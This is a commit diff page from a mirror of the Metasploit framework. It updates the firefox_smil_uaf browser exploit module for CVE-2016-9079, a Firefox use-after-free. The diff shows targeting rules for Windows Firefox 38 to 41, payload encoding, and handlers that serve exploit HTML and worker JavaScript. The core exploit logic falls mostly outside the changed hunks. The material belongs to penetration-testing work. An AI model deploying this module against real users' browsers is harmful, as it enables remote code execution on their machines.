infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #7895, Update firefox_uaf_smil to use BrowserExploitServer

bug/bundler_fix
William Webb 2017-02-01 16:42:39 -06:00
parent 321fa91c75 3c6fa12aca
commit b4a9bfc7a9
No known key found for this signature in database
GPG Key ID: 341763D0308DA650
1 changed files with 19 additions and 23 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

42
modules/exploits/windows/browser/firefox_smil_uaf.rb
View File

@ -8,7 +8,7 @@ require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking Rank = NormalRanking
include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::BrowserExploitServer
def initialize(info={}) def initialize(info={})
super(update_info(info, super(update_info(info,
@ -25,9 +25,17 @@ require 'msf/core'
'William Webb <william_webb[at]rapid7.com>' # Metasploit module 'William Webb <william_webb[at]rapid7.com>' # Metasploit module
], ],
'Platform' => 'win', 'Platform' => 'win',
'BrowserRequirements' =>
{
source: /script/i,
os_name: OperatingSystems::Match::WINDOWS,
ua_name: HttpClients::FF,
# Fixed in Firefox 50.0.2
ua_ver: lambda { |ver| ver.to_i.between?(38, 41) }
},
'Targets' => 'Targets' =>
[ [
[ 'Mozilla Firefox', [ 'Mozilla Firefox 38 to 41',
{ {
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86, 'Arch' => ARCH_X86,
@ -40,11 +48,11 @@ require 'msf/core'
'InitialAutoRunScript' => 'migrate -f' 'InitialAutoRunScript' => 'migrate -f'
}, },
'References' => 'References' =>
[ [
[ 'CVE', '2016-9079' ], [ 'CVE', '2016-9079' ],
[ 'Bugzilla', '1321066' ] [ 'URL', 'https://bugzilla.mozilla.org/show_bug.cgi?id=1321066' ],
], [ 'URL', 'https://www.mozilla.org/en-US/security/advisories/mfsa2016-92/' ]
'Arch' => ARCH_X86, ],
'DisclosureDate' => "Nov 30 2016", 'DisclosureDate' => "Nov 30 2016",
'DefaultTarget' => 0 'DefaultTarget' => 0
) )
@ -60,7 +68,7 @@ require 'msf/core'
p = payload.encoded p = payload.encoded
arch = Rex::Arch.endian(target.arch) arch = Rex::Arch.endian(target.arch)
payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u') payload_final = Rex::Text.to_unescape(p, arch, prefix='\\u')
base_uri = "#{get_resource.chomp('/')}" base_uri = get_module_resource
# stuff that gets adjusted alot during testing # stuff that gets adjusted alot during testing
@ -248,28 +256,16 @@ require 'msf/core'
send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' }) send_response(cli, c, { 'Content-Type' => 'application/javascript', 'Pragma' => 'no-cache', 'Cache-Control' => 'no-cache', 'Connection' => 'close' })
end end
def is_ff_on_windows(user_agent) def on_request_exploit(cli, request, browser_info)
target_hash = fingerprint_user_agent(user_agent)
if target_hash[:ua_name] !~ /Firefox/ or target_hash[:os_name] !~ /Windows/
return false
end
return true
end
def on_request_uri(cli, request)
print_status("Got request: #{request.uri}") print_status("Got request: #{request.uri}")
print_status("From: #{request.headers['User-Agent']}") print_status("From: #{request.headers['User-Agent']}")
if (!is_ff_on_windows(request.headers['User-Agent']))
print_error("Unsupported user agent: #{request.headers['User-Agent']}")
send_not_found(cli)
close_client(cli)
return
end
if request.uri =~ /worker\.js/ if request.uri =~ /worker\.js/
print_status("Sending worker thread Javascript ...") print_status("Sending worker thread Javascript ...")
worker_js(cli) worker_js(cli)
return return
end end
if request.uri =~ /index\.html/ or request.uri =~ /\// if request.uri =~ /index\.html/ or request.uri =~ /\//
print_status("Sending exploit HTML ...") print_status("Sending exploit HTML ...")